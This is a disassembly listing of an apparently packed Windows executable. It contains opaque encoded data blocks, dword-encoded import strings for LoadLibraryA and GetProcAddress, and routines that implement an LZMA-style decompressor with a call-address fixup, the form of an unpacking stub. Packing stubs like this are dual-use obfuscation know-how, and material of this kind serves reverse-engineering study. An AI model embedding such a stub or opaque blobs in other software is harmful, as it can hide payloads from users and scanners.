dd 85517539h, 0AE658919h, 891075E0h, 139EFB55h, 0B2510DBCh
dd 0DFA90DCh, 983F4D47h, 0E3434569h, 0EC4AAA09h, 41B67D72h
dd 82831C19h, 82BFF294h, 82626066h, 0A32D80F9h, 0D33F7E97h
dd 29F3F2A7h, 8C0220D9h, 0C84E27D0h, 0F6D0B11Eh, 60E2122Fh
dd 8BAA12D9h, 602C98F3h, 8726C7B3h, 261DE69Ah, 1CBAC2AAh
dd 54E78BA3h, 61B486DAh, 21C7497Bh, 0DAD7D313h, 4606DE8Dh
dd 0AC594A6Ch, 0D8D52752h, 0F9E1B81Eh, 4667FDE5h, 0FBBF23CBh
dd 2D05DC58h, 0CACD4B80h, 2DADC919h, 0C5E366F1h, 761FF72Fh
dd 0CE9AB5E8h, 1B464A62h, 0D24202D8h, 0A862A8CEh, 4C84541h
dd 0F4F45E90h, 0F9E1077Ah, 0DDF0033Dh, 33D6559Fh, 3805BE85h
dd 48E3A7FCh, 56486B1Eh, 687AECD5h, 9CD30DE8h, 731DDD44h
dd 0D68694CDh, 6C9B6F8Dh, 937C1F36h, 50E7505Dh, 4E681CF9h
dd 32775B5Dh, 0C66008A6h, 4A8033EAh, 0AB892D26h, 0A69316C5h
dd 9F60FB35h, 0EA54E7E1h, 41BDDCC2h, 6939A8C6h, 61F8EF1Ch
dd 0D765AA29h, 4A16BEBDh, 0FBA6AA87h, 0AF8365A8h, 0E1154E4Ah
dd 51E085D0h, 3DE0870Ah, 555112ECh, 907ABB86h, 817271FCh
dd 3B87908Dh, 59AAEF63h, 4557DBC1h, 41AE4068h, 0C2F13251h
dd 0A6BC7314h, 642081FDh, 83D0DE0Fh, 4FEC7247h, 6052FCD8h
dd 4AAE67Ch, 0E6DAF0B1h, 150C968Fh, 1A4775DFh, 20E22383h
dd 3F48FF65h, 335C005Fh, 3789A584h, 0E906B4E2h, 0E0A0FF64h
dd 0A61A327h, 0B5AF7084h, 0F3B2D3CCh, 7A8BE585h, 0AD1CC663h
dd 0C1D3D624h, 0B928BD83h, 0C77A27CEh, 0AEBE557Fh, 0EC87ECD2h
dd 96B04174h, 0A1DA8E4Ch, 61829573h, 0C5906434h, 12F14DE5h
dd 943C6555h, 8F54D02Fh, 0FEFD5D36h, 615FE15Ch, 0D99AFE27h
dd 9B48D21h, 1A6C8062h, 0AA48FEF8h, 0B88B2BECh, 0EEBDFE9Dh
dd 0D6F864AAh, 6903D81Eh, 708452BAh, 0CFCF2F84h, 34BF6B2h
dd 5701EB77h, 8D801AB9h, 40289960h, 29094B8Ah, 6573B997h
dd 56162380h, 19F2E88Ah, 347D4CF6h, 5236C90Dh, 0B2D790BAh
dd 454261A4h, 0D56EB12Dh, 0C0C4A7F2h, 0AB56C512h, 6322F84Ch
dd 4C331208h, 86EEA225h, 85C0B709h, 0E3DDA01Ch, 19608F54h
dd 0BBFAE3F0h, 249F68D1h, 5BBA140Bh, 0BF6D2D61h, 0EBC5AFD1h
dd 9E5F1DC1h, 3F7B44CDh, 0EEC84CC0h, 7811F999h, 8F027658h
dd 1914DF5Ah, 9990871Ah, 85B447ADh, 40C8BC84h, 72656B00h
dd 336C656Eh, 6C642E32h, 6F4C006Ch, 694C6461h, 72617262h
dd 47004179h, 72507465h, 6441636Fh, 73657264h
db 73h, 0
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
db 0Ch
dd 0D0h, 0
dd 9D000000h, 0C00011Fh
db 0D0h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_411FDF proc near ; CODE XREF: __u_____:0041228F�p
and dword ptr [ecx+8], 0
or dword ptr [ecx+4], 0FFFFFFFFh
push esi
push edi
push 5
mov [ecx], edx
pop edx
loc_411FEE: ; CODE XREF: sub_411FDF+23�j
mov eax, [ecx]
mov esi, [ecx+8]
shl esi, 8
movzx edi, byte ptr [eax]
or esi, edi
inc eax
dec edx
mov [ecx+8], esi
mov [ecx], eax
jnz short loc_411FEE
pop edi
pop esi
retn
sub_411FDF endp
; =============== S U B R O U T I N E =======================================
sub_412007 proc near ; CODE XREF: __u_____:004124A5�p
push esi
mov esi, [ecx+4]
xor eax, eax
push edi
mov edi, [ecx+8]
test edx, edx
jle short loc_412042
push ebx
push ebp
mov ebx, edx
loc_412019: ; CODE XREF: sub_412007+37�j
shr esi, 1
shl eax, 1
cmp edi, esi
jb short loc_412025
sub edi, esi
or al, 1
loc_412025: ; CODE XREF: sub_412007+18�j
cmp esi, 1000000h
jnb short loc_41203D
mov edx, [ecx]
shl edi, 8
movzx ebp, byte ptr [edx]
shl esi, 8
or edi, ebp
inc edx
mov [ecx], edx
loc_41203D: ; CODE XREF: sub_412007+24�j
dec ebx
jnz short loc_412019
pop ebp
pop ebx
loc_412042: ; CODE XREF: sub_412007+C�j
mov [ecx+8], edi
mov [ecx+4], esi
pop edi
pop esi
retn
sub_412007 endp
; =============== S U B R O U T I N E =======================================
sub_41204B proc near ; CODE XREF: sub_4120E3+1E�p
; sub_41211D+23�p ...
push esi
mov esi, [edx+4]
push edi
mov eax, esi
movzx edi, word ptr [ecx]
shr eax, 0Bh
imul eax, edi
mov edi, [edx+8]
cmp edi, eax
jnb short loc_4120A1
mov [edx+4], eax
mov ax, [ecx]
movzx esi, ax
mov edi, 800h
sub edi, esi
sar edi, 5
add edi, eax
mov [ecx], di
mov eax, [edx+4]
cmp eax, 1000000h
jnb short loc_41209D
mov ecx, [edx]
mov esi, [edx+8]
shl esi, 8
movzx edi, byte ptr [ecx]
or esi, edi
inc ecx
shl eax, 8
mov [edx+8], esi
mov [edx], ecx
mov [edx+4], eax
loc_41209D: ; CODE XREF: sub_41204B+37�j
xor eax, eax
jmp short loc_4120E0
; ---------------------------------------------------------------------------
loc_4120A1: ; CODE XREF: sub_41204B+15�j
sub esi, eax
sub edi, eax
mov [edx+4], esi
mov [edx+8], edi
mov ax, [ecx]
mov si, ax
shr si, 5
sub eax, esi
mov [ecx], ax
mov eax, [edx+4]
cmp eax, 1000000h
jnb short loc_4120DD
mov ecx, [edx]
mov esi, [edx+8]
shl esi, 8
movzx edi, byte ptr [ecx]
or esi, edi
inc ecx
shl eax, 8
mov [edx+8], esi
mov [edx], ecx
mov [edx+4], eax
loc_4120DD: ; CODE XREF: sub_41204B+77�j
push 1
pop eax
loc_4120E0: ; CODE XREF: sub_41204B+54�j
pop edi
pop esi
retn
sub_41204B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4120E3 proc near ; CODE XREF: sub_4121DD+1E�p
; sub_4121DD+45�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
mov ebx, edx
push 1
test ebx, ebx
mov edi, ecx
pop eax
jle short loc_41210E
push esi
mov [ebp+var_4], ebx
loc_4120F8: ; CODE XREF: sub_4120E3+28�j
mov edx, [ebp+arg_0]
lea esi, [eax+eax]
lea ecx, [esi+edi]
call sub_41204B
add eax, esi
dec [ebp+var_4]
jnz short loc_4120F8
pop esi
loc_41210E: ; CODE XREF: sub_4120E3+F�j
push 1
mov ecx, ebx
pop edx
pop edi
shl edx, cl
pop ebx
sub eax, edx
leave
retn 4
sub_4120E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41211D proc near ; CODE XREF: __u_____:loc_412496�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push edi
mov [ebp+var_8], edx
xor edi, edi
cmp [ebp+var_8], edi
push 1
mov ebx, ecx
pop edx
mov [ebp+var_4], edi
jle short loc_412156
push esi
loc_412137: ; CODE XREF: sub_41211D+36�j
lea esi, [edx+edx]
mov edx, [ebp+arg_0]
lea ecx, [esi+ebx]
call sub_41204B
mov ecx, edi
lea edx, [esi+eax]
shl eax, cl
or [ebp+var_4], eax
inc edi
cmp edi, [ebp+var_8]
jl short loc_412137
pop esi
loc_412156: ; CODE XREF: sub_41211D+17�j
mov eax, [ebp+var_4]
pop edi
pop ebx
leave
retn 4
sub_41211D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41215F proc near ; CODE XREF: __u_____:00412303�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
movzx esi, [ebp+arg_0]
shr esi, 7
shl [ebp+arg_0], 1
mov eax, esi
push edi
mov edi, ecx
mov [ebp+var_4], edx
shl eax, 9
lea ecx, [eax+edi+202h]
call sub_41204B
mov ebx, eax
or ebx, 2
loc_41218B: ; CODE XREF: sub_41215F+59�j
cmp esi, eax
jnz short loc_4121BA
cmp ebx, 100h
jge short loc_4121D4
movzx esi, [ebp+arg_0]
shr esi, 7
mov edx, [ebp+var_4]
shl [ebp+arg_0], 1
lea eax, [esi+1]
shl eax, 8
add eax, ebx
lea ecx, [edi+eax*2]
call sub_41204B
add ebx, ebx
or ebx, eax
jmp short loc_41218B
; ---------------------------------------------------------------------------
loc_4121BA: ; CODE XREF: sub_41215F+2E�j
mov esi, 100h
loc_4121BF: ; CODE XREF: sub_41215F+73�j
cmp ebx, esi
jge short loc_4121D4
mov edx, [ebp+var_4]
add ebx, ebx
lea ecx, [ebx+edi]
call sub_41204B
or ebx, eax
jmp short loc_4121BF
; ---------------------------------------------------------------------------
loc_4121D4: ; CODE XREF: sub_41215F+36�j
; sub_41215F+62�j
pop edi
mov al, bl
pop esi
pop ebx
leave
retn 4
sub_41215F endp
; =============== S U B R O U T I N E =======================================
sub_4121DD proc near ; CODE XREF: __u_____:004123FE�p
; __u_____:00412446�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, edx
mov esi, ecx
call sub_41204B
test eax, eax
jnz short loc_412202
mov eax, [esp+8+arg_0]
push edi
shl eax, 4
push 3
pop edx
lea ecx, [eax+esi+4]
call sub_4120E3
jmp short loc_41223D
; ---------------------------------------------------------------------------
loc_412202: ; CODE XREF: sub_4121DD+D�j
mov edx, edi
lea ecx, [esi+2]
call sub_41204B
test eax, eax
push edi
jnz short loc_41222C
mov eax, [esp+0Ch+arg_0]
push 3
shl eax, 4
pop edx
lea ecx, [eax+esi+104h]
call sub_4120E3
add eax, 8
jmp short loc_41223D
; ---------------------------------------------------------------------------
loc_41222C: ; CODE XREF: sub_4121DD+32�j
push 8
lea ecx, [esi+204h]
pop edx
call sub_4120E3
add eax, 10h
loc_41223D: ; CODE XREF: sub_4121DD+23�j
; sub_4121DD+4D�j
pop edi
pop esi
retn 4
sub_4121DD endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 40h
push ebx
lodsd
push eax
lodsd
mov [ebp-28h], eax
mov ebx, [ebp-28h]
loc_412252: ; CODE XREF: __u_____:00412297�j
; __u_____:004124C3�j
lodsd
mov [ebp-28h], eax
lodsd
mov [ebp-18h], eax
push eax
lodsd
inc esi
mov [ebp-2Ch], esi
add esi, eax
push esi
mov edx, [ebp-2Ch]
and byte ptr [ebp-1], 0
mov ecx, 1B9Bh
mov eax, 4000400h
mov edi, ebx
push 1
rep stosd
pop edi
xor esi, esi
lea ecx, [ebp-40h]
mov [ebp-14h], edi
mov [ebp-10h], edi
mov [ebp-24h], edi
mov [ebp-8], esi
mov [ebp-20h], esi
call sub_411FDF
cmp [ebp-28h], esi
jbe short loc_412252
loc_412299: ; CODE XREF: __u_____:004124F8�j
mov eax, [ebp-8]
mov ecx, esi
and eax, 3
lea edx, [ebp-40h]
shl ecx, 4
add ecx, eax
mov [ebp-0Ch], eax
lea ecx, [ebx+ecx*2]
call sub_41204B
test eax, eax
jnz loc_41233D
movzx eax, byte ptr [ebp-1]
shr eax, 4
lea eax, [eax+eax*2]
shl eax, 9
cmp esi, 4
lea ecx, [eax+ebx+0E6Ch]
mov [ebp-0Ch], ecx
jge short loc_4122DC
xor esi, esi
jmp short loc_4122E9
; ---------------------------------------------------------------------------
loc_4122DC: ; CODE XREF: __u_____:004122D6�j
cmp esi, 0Ah
jge short loc_4122E6
sub esi, 3
jmp short loc_4122E9
; ---------------------------------------------------------------------------
loc_4122E6: ; CODE XREF: __u_____:004122DF�j
sub esi, 6
loc_4122E9: ; CODE XREF: __u_____:004122DA�j
; __u_____:004122E4�j
cmp dword ptr [ebp-20h], 0
jz short loc_412311
mov eax, [ebp-8]
mov edx, [ebp-18h]
sub eax, edi
mov al, [eax+edx]
lea edx, [ebp-40h]
mov [ebp-30h], al
push dword ptr [ebp-30h]
call sub_41215F
and dword ptr [ebp-20h], 0
mov [ebp-1], al
jmp short loc_412335
; ---------------------------------------------------------------------------
loc_412311: ; CODE XREF: __u_____:004122ED�j
push 1
pop eax
jmp short loc_412319
; ---------------------------------------------------------------------------
loc_412316: ; CODE XREF: __u_____:00412330�j
mov ecx, [ebp-0Ch]
loc_412319: ; CODE XREF: __u_____:00412314�j
add eax, eax
lea edx, [ebp-40h]
add ecx, eax
mov [ebp-34h], eax
call sub_41204B
or eax, [ebp-34h]
cmp eax, 100h
jl short loc_412316
mov [ebp-1], al
loc_412335: ; CODE XREF: __u_____:0041230F�j
mov eax, [ebp-18h]
mov cl, [ebp-1]
jmp short loc_4123A3
; ---------------------------------------------------------------------------
loc_41233D: ; CODE XREF: __u_____:004122B6�j
lea edx, [ebp-40h]
lea ecx, [ebx+esi*2+180h]
mov dword ptr [ebp-20h], 1
call sub_41204B
cmp eax, 1
jnz loc_41241B
lea edx, [ebp-40h]
lea ecx, [ebx+esi*2+198h]
call sub_41204B
test eax, eax
lea edx, [ebp-40h]
jnz short loc_4123B1
lea eax, [esi+0Fh]
shl eax, 4
add eax, [ebp-0Ch]
lea ecx, [ebx+eax*2]
call sub_41204B
test eax, eax
jnz short loc_4123F2
cmp esi, 7
mov ecx, [ebp-8]
setnl al
dec eax
and al, 0FEh
add eax, 0Bh
sub ecx, edi
mov esi, eax
mov eax, [ebp-18h]
mov cl, [ecx+eax]
mov [ebp-1], cl
loc_4123A3: ; CODE XREF: __u_____:0041233B�j
mov edx, [ebp-8]
inc dword ptr [ebp-8]
mov [edx+eax], cl
jmp loc_4124F2
; ---------------------------------------------------------------------------
loc_4123B1: ; CODE XREF: __u_____:00412370�j
lea ecx, [ebx+esi*2+1B0h]
call sub_41204B
test eax, eax
jnz short loc_4123C6
mov eax, [ebp-14h]
jmp short loc_4123ED
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: __u_____:004123BF�j
lea edx, [ebp-40h]
lea ecx, [ebx+esi*2+1C8h]
call sub_41204B
test eax, eax
jnz short loc_4123DE
mov eax, [ebp-10h]
jmp short loc_4123E7
; ---------------------------------------------------------------------------
loc_4123DE: ; CODE XREF: __u_____:004123D7�j
mov ecx, [ebp-10h]
mov eax, [ebp-24h]
mov [ebp-24h], ecx
loc_4123E7: ; CODE XREF: __u_____:004123DC�j
mov ecx, [ebp-14h]
mov [ebp-10h], ecx
loc_4123ED: ; CODE XREF: __u_____:004123C4�j
mov [ebp-14h], edi
mov edi, eax
loc_4123F2: ; CODE XREF: __u_____:00412385�j
push dword ptr [ebp-0Ch]
lea edx, [ebp-40h]
lea ecx, [ebx+0A68h]
call sub_4121DD
mov [ebp-0Ch], eax
xor eax, eax
cmp esi, 7
setnl al
dec eax
and al, 0FDh
add eax, 0Bh
mov esi, eax
jmp loc_4124C1
; ---------------------------------------------------------------------------
loc_41241B: ; CODE XREF: __u_____:00412356�j
mov eax, [ebp-10h]
push dword ptr [ebp-0Ch]
mov [ebp-24h], eax
mov eax, [ebp-14h]
mov [ebp-10h], eax
xor eax, eax
cmp esi, 7
lea edx, [ebp-40h]
setnl al
dec eax
lea ecx, [ebx+664h]
and al, 0FDh
mov [ebp-14h], edi
add eax, 0Ah
mov esi, eax
call sub_4121DD
cmp eax, 4
mov [ebp-0Ch], eax
jl short loc_412456
push 3
pop eax
loc_412456: ; CODE XREF: __u_____:00412451�j
lea ecx, [ebp-40h]
push ecx
push 6
shl eax, 7
pop edx
lea ecx, [eax+ebx+360h]
call sub_4120E3
cmp eax, 4
jl short loc_4124BE
mov ecx, eax
mov edi, eax
sar ecx, 1
and edi, 1
dec ecx
or edi, 2
shl edi, cl
cmp eax, 0Eh
jge short loc_41249F
lea edx, [ebp-40h]
push edx
mov edx, ecx
mov ecx, edi
sub ecx, eax
lea ecx, [ebx+ecx*2+55Eh]
loc_412496: ; CODE XREF: __u_____:004124BC�j
call sub_41211D
add edi, eax
jmp short loc_4124C0
; ---------------------------------------------------------------------------
loc_41249F: ; CODE XREF: __u_____:00412483�j
lea edx, [ecx-4]
lea ecx, [ebp-40h]
call sub_412007
shl eax, 4
add edi, eax
lea eax, [ebp-40h]
push eax
push 4
pop edx
lea ecx, [ebx+644h]
jmp short loc_412496
; ---------------------------------------------------------------------------
loc_4124BE: ; CODE XREF: __u_____:0041246F�j
mov edi, eax
loc_4124C0: ; CODE XREF: __u_____:0041249D�j
inc edi
loc_4124C1: ; CODE XREF: __u_____:00412416�j
test edi, edi
jz loc_412252
add dword ptr [ebp-0Ch], 2
loc_4124CD: ; CODE XREF: __u_____:004124F0�j
mov edx, [ebp-8]
mov ecx, [ebp-18h]
mov eax, edx
sub eax, edi
mov al, [eax+ecx]
mov [edx+ecx], al
inc edx
dec dword ptr [ebp-0Ch]
mov [ebp-1], al
cmp dword ptr [ebp-0Ch], 0
mov [ebp-8], edx
jle short loc_4124F2
cmp edx, [ebp-28h]
jb short loc_4124CD
loc_4124F2: ; CODE XREF: __u_____:004123AC�j
; __u_____:004124EB�j
mov eax, [ebp-8]
cmp eax, [ebp-28h]
jb loc_412299
pop ebx
pop esi
pop edx
xor ecx, ecx
loc_412503: ; CODE XREF: __u_____:0041251C�j
inc ecx
lodsb
sub al, 0E8h
jz short loc_41250F
dec al
jz short loc_41250F
jmp short loc_41251A
; ---------------------------------------------------------------------------
loc_41250F: ; CODE XREF: __u_____:00412507�j
; __u_____:0041250B�j
mov edi, esi
lodsd
bswap eax
sub eax, ecx
stosd
add ecx, 4
loc_41251A: ; CODE XREF: __u_____:0041250D�j
cmp ecx, edx
jnz short loc_412503
xchg ebx, esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 0E2h
dd 3A043305h, 5E706h, 5 dup(40004h), 59040004h, 0FF053205h
dd 4AF04h, 5 dup(40004h), 0D0040004h, 96033E03h, 4F804h
dd 5 dup(40004h), 1E040004h, 3D04C304h, 43304h, 5 dup(40004h)
dd 0A040004h, 0E031B05h, 42204h, 5 dup(40004h), 8C040004h
dd 64028002h, 1B303h, 5 dup(40004h), 37040004h, 4203CA04h
dd 39103h, 5 dup(40004h), 0F9040004h, 9C050E04h, 59D05h
dd 5 dup(40004h), 62040004h, 8206AB06h, 66506h, 5 dup(40004h)
dd 9040004h, 0B8054705h, 5DA05h, 5 dup(40004h), 0F1040004h
dd 6D05C505h, 50504h, 5 dup(40004h), 4E040004h, 0C303A607h
dd 4C202h, 5 dup(40004h), 9C040004h, 9106C007h, 2E044404h
dd 0E204h, 0C707E104h, 0E1067F07h, 0EC035607h, 75070A04h
dd 84057007h, 0FC079107h, 5A01A006h, 0AD026D00h, 0B001C601h
dd 20043403h, 3E042004h, 1F04EA04h, 0FA042304h, 7050D05h
dd 7D065304h, 2003FE04h, 0BD040004h, 20050B04h, 9049004h
dd 0CB043D05h, 3E042004h, 8A034B04h, 5D604h, 5 dup(40004h)
dd 2040004h, 0E02E802h, 38702h, 5 dup(40004h), 0EC040004h
dd 8A02A302h, 2FE01h, 5 dup(40004h), 0E0040004h, 0DF041F03h
dd 3A303h, 5 dup(40004h), 0C4040004h, 5500E102h, 0F801h
dd 5 dup(40004h), 0D7040004h, 25007701h, 0FB02h, 5 dup(40004h)
dd 4040004h, 7043803h, 48A03h, 0Eh dup(40004h), 0E0040004h
dd 40003h, 6 dup(40004h), 0E0040004h, 42003h, 0Eh dup(40004h)
dd 20040004h, 3E004h, 6 dup(40004h), 0E107E104h, 0FE040007h
dd 40003h, 74040004h, 6A001h, 2 dup(40004h), 2A040004h
dd 51044C02h, 70004h, 5 dup(40004h), 9E040004h, 1C050204h
dd 7D04F205h, 0D204C504h, 40003h, 0Ch dup(40004h), 0A907E104h
dd 6B040004h, 5CA02h, 0D1040004h, 7B033B00h, 72404h, 40004h
dd 81040004h, 0AE02DD03h, 9046604h, 0A304D803h, 47A04h
dd 3 dup(40004h), 53040004h, 6D02AA04h, 86041D03h, 27040104h
dd 73042505h, 22049904h, 34043304h, 3F041E05h, 9 dup(40004h)
dd 5407E104h, 0C6040003h, 3AE00h, 4040004h, 1C03A802h
dd 6CA03h, 40004h, 0E2040004h, 0F7035003h, 0A2042103h
dd 64020003h, 5B804h, 3 dup(40004h), 78040004h, 8F033504h
dd 47042C03h, 0D5039F05h, 52048603h, 0F204AA04h, 0A6042203h
dd 89053903h, 40005h, 8 dup(40004h), 0C107E104h, 92040003h
dd 35500h, 3A040004h, 9A02DC01h, 5B903h, 40004h, 78040004h
dd 0B5020F04h, 9B046604h, 0B503B203h, 61B03h, 3 dup(40004h)
dd 0A7040004h, 4403E004h, 34032303h, 49040304h, 77041C05h
dd 7F04EB04h, 7C065703h, 64053B04h, 40005h, 7 dup(40004h)
dd 0E8040004h, 0E1033E02h, 6E03D103h, 0E203A503h, 0D803AD03h
dd 38046403h, 36049004h, 5904D105h, 0DE033A04h, 4E042A04h
dd 0A603B404h, 0DC04B404h, 0C103CD03h, 4F03BC03h, 6C043203h
dd 0D303FF03h, 2C044904h, 0F9047103h, 0FA041A03h, 0A03C003h
dd 0D204B104h, 51038503h, 0FB04F503h, 21037603h, 1D038D05h
dd 0F203F604h, 3B03D103h, 56041F04h, 9903F804h, 0E2031303h
dd 7103E403h, 6F047B04h, 7C039404h, 36049A04h, 73033504h
dd 1D042704h, 0D403F604h, 2003D903h, 303C904h, 97047404h
dd 78045B03h, 0FC045304h, 6504CF03h, 98027E05h, 4503E603h
dd 1E036504h, 1F03DF04h, 4703BB04h, 1304A404h, 38042D04h
dd 0A0041404h, 0C203C303h, 6A03A303h, 603E303h, 0D5045D04h
dd 1E047A03h, 0E3041404h, 41403h, 44704h, 0D303AC04h, 2E036A03h
dd 0CD030B04h, 4A03A203h, 9A04DA04h, 5603C103h, 5D03B303h
dd 68407h, 0E5065F04h, 0F9045E03h, 5505F202h, 44804h, 0C05D504h
dd 0B3057005h, 0B9048601h, 4D505h, 9F063404h, 0A706EC04h
dd 0B6056D02h, 4D605h, 27067404h, 0F062E04h, 11052D03h
dd 4A305h, 30h dup(40004h), 1E059004h, 0B0047405h, 3D044C03h
dd 45A04h, 0E3055304h, 8A05F005h, 0B704A604h, 41603h, 5E04FF04h
dd 5F047605h, 9503A604h, 3AB04h, 4105B104h, 4E047104h
dd 9B039F04h, 48204h, 30h dup(40004h), 0BC07BC04h, 77040007h
dd 40007h, 0F2040004h, 41E06h, 2 dup(40004h), 87040004h
dd 104D406h, 41F04h, 5 dup(40004h), 80040004h, 0D9045C05h
dd 0C1041F04h, 0FF03C103h, 42003h, 0Bh dup(40004h), 0A4040004h
dd 803CD03h, 3503C704h, 0C1043F04h, 3E003h, 43F04h, 20043F04h
dd 0E0042004h, 40003h, 17h dup(40004h), 8A040004h, 0C3049E04h
dd 20037203h, 0FF03E604h, 0C3043D03h, 3F03C203h, 40004h
dd 3C104h, 42004h, 1040004h, 40004h, 0C1040004h, 2 dup(0E0040003h)
dd 40003h, 3E004h, 30h dup(40004h), 75040004h, 63F07h
dd 7F066704h, 7C033E05h, 0E1052C03h, 4AE03h, 0D3068F04h
dd 1D03A404h, 28027A02h, 5D703h, 0E3067604h, 9A055005h
dd 8E045103h, 3C305h, 0D1065004h, 0E903EA02h, 70024002h
dd 47203h, 30h dup(40004h), 9803C004h, 2046203h, 55037B04h
dd 3F304h, 0E7037704h, 0AA053703h, 0BC03BB03h, 3C703h
dd 0A4043104h, 21045303h, 0E103B504h, 3E603h, 30041904h
dd 5904D703h, 0E0036604h, 42003h, 30h dup(40004h), 39074204h
dd 0FA03C107h, 42006h, 8C03C104h, 20040206h, 2 dup(40004h)
dd 6203C104h, 3F03E005h, 0E003C104h, 40003h, 4 dup(40004h)
dd 0F703C104h, 0FF043104h, 1045D03h, 40004h, 43F04h, 3E004h
dd 0Ah dup(40004h), 2B03C104h, 8C04E204h, 2003A704h, 0A3042004h
dd 0E0040003h, 3E003h, 40004h, 1040004h, 2 dup(40004h)
dd 42004h, 15h dup(40004h), 0DF03C104h, 43043903h, 8C03C104h
dd 20042003h, 0E0040104h, 0E0040003h, 40003h, 41E04h, 40004h
dd 3E004h, 42004h, 3 dup(40004h), 20040004h, 3E004h, 3 dup(40004h)
dd 0E0040004h, 40003h, 2Bh dup(40004h), 3C104h, 0A4043204h
dd 8B055F02h, 90043103h, 0D203D906h, 0DE01D006h, 0ED03E701h
dd 70021406h, 0E4032A04h, 0B5043404h, 9403E603h, 1A074305h
dd 8D05C401h, 0E041E03h, 70027905h, 95039705h, 36024302h
dd 0EE02CE06h, 71051704h, 0DF042604h, 0CC04AD05h, 51039B04h
dd 0D604FE04h, 88077802h, 0E1033601h, 9405B704h, 42043F03h
dd 51045705h, 0EB041A03h, 0D6040403h, 10042303h, 3705DE04h
dd 1001C203h, 7D04EB06h, 0FD02BE04h, 74047904h, 0F503FF04h
dd 46047904h, 94037103h, 85050603h, 6204F503h, 7903C705h
dd 3E040204h, 4900AC04h, 6903E204h, 4603A104h, 5503F404h
dd 9105F203h, 9203FF04h, 97060F04h, 8C061F03h, 0CA040504h
dd 1045E03h, 0FF047A04h, 55045D03h, 9A030D04h, 58025804h
dd 5D02AA04h, 95049604h, 0F603DF04h, 1A042003h, 8D040104h
dd 1E045D02h, 3D033504h, 801CE04h, 9F03E406h, 1048D04h
dd 2043F04h, 0AB027E04h, 0E2041F04h, 0D9042003h, 0FF03A904h
dd 0E103C103h, 3D03AB04h, 0AB045104h, 69037004h, 0F053803h
dd 0BE038604h, 0A5043B03h, 7303EC03h, 9B03E104h, 0FE03DF04h
dd 0F0040003h, 9603E103h, 0CB049C03h, 5101AE05h, 0B304AD04h
dd 57033A03h, 0F2049404h, 0A003E103h, 13053904h, 3906DB07h
dd 0FC040304h, 31045C04h
dd 60042404h, 31043C04h, 4B043F04h, 3001C805h, 0AC047A03h
dd 3C021902h, 1C047202h, 2203C104h, 0FA03C504h, 4E039003h
dd 9F043F04h, 3D03A204h, 5D040004h, 0E103E104h, 5C040003h
dd 0FF03C104h, 0B903AB03h, 0E2040104h, 9F04B103h, 20040204h
dd 3B042C04h, 9603E004h, 35040004h, 0FE03E004h, 7403E103h
dd 5903FE04h, 5D03C104h, 3F03FF04h, 3E03C104h, 5D020404h
dd 3F040004h, 3F03E004h, 5D03B104h, 20042004h, 19B04h
dd 0A2043704h, 2076303h, 5804DD05h, 62046607h, 16054006h
dd 0C704C705h, 0E0040106h, 0B703C603h, 1E042005h, 80050B04h
dd 2305E804h, 0D6057104h, 2003CF03h, 40004h, 0E0040004h
dd 37042003h, 2003FF05h, 0E003E004h, 0A3041E03h, 0E2042003h
dd 9703E003h, 42002h, 0FE048C04h, 22045703h, 1E045C04h
dd 38604h, 40004h, 42004h, 40004h, 3E004h, 0E0043F04h
dd 5B040003h, 3FF04h, 2 dup(40004h), 20040004h, 20042004h
dd 2003FF04h, 2003E104h, 0E0040004h, 0E0042003h, 0E003C103h
dd 2003E003h, 40004h, 0C1042004h, 0FF043F03h, 0E0045A03h
dd 5D040003h, 86047404h, 0E003C103h, 40003h, 3FF04h, 7 dup(40004h)
dd 3E004h, 0C1040004h, 40003h, 40004h, 0EC040004h, 0E0040002h
dd 3E003h, 3E004h, 5 dup(40004h), 0E0040004h, 0E0040003h
dd 40003h, 0E0040004h, 0E0040003h, 0E003E003h, 40003h
dd 4 dup(40004h), 3E004h, 40004h, 3C104h, 2 dup(40004h)
dd 0E0040004h, 40003h, 0C103A304h, 0E003E003h, 0E003C103h
dd 0E003E003h, 3E003h, 0A3040004h, 0C1040003h, 40003h
dd 2 dup(3C104h), 1Ch dup(40004h), 0DA035004h, 39041500h
dd 0F4031501h, 0FE036903h, 0DB02F603h, 0D702F401h, 0C103A402h
dd 38045303h, 0A3041E04h, 61043903h, 0C803E003h, 0ED037002h
dd 2EC02h, 20036A04h, 0C103A304h, 0C103E003h, 42003h, 1040004h
dd 0DE036A04h, 3B042003h, 0A5041804h, 3F040004h, 0D03E004h
dd 6A042003h, 0E003E403h, 20043103h, 40004h, 43F04h, 40004h
dd 3C104h, 40004h, 0FF03E004h, 0E003E003h, 20040003h, 40004h
dd 0E0040004h, 20040003h, 20045D04h, 3E004h, 2 dup(40004h)
dd 3E004h, 3A304h, 40004h, 0FA040004h, 0C103E003h, 0E0042003h
dd 20040003h, 0E2040004h, 2003E203h, 42004h, 3E004h, 2 dup(40004h)
dd 3F040004h, 4 dup(40004h), 42004h, 3 dup(40004h), 3F042004h
dd 43F04h, 6 dup(40004h), 20040004h, 42004h, 40004h, 20040004h
dd 5 dup(40004h), 20040004h, 4 dup(40004h), 20042004h
dd 6 dup(40004h), 7A040004h, 3 dup(40004h), 5D040004h
dd 5 dup(40004h), 20040004h, 42004h, 18h dup(40004h), 0BB03A104h
dd 87056803h, 0F3053704h, 0B2040F05h, 1903F205h, 8F050803h
dd 15039406h, 0DD033804h, 1F039004h, 0E603C604h, 0C1056104h
dd 0A9043F02h, 0E503D103h, 12041B03h, 98049C04h, 0D3032703h
dd 0E103E204h, 0E0044103h, 0FD047003h, 70046603h, 7003DF04h
dd 0A7042003h, 0CB058C03h, 16040103h, 3E04A105h, 0C703FF04h
dd 0FF043F03h, 103A903h, 6A041A04h, 1043B04h, 0C2045D04h
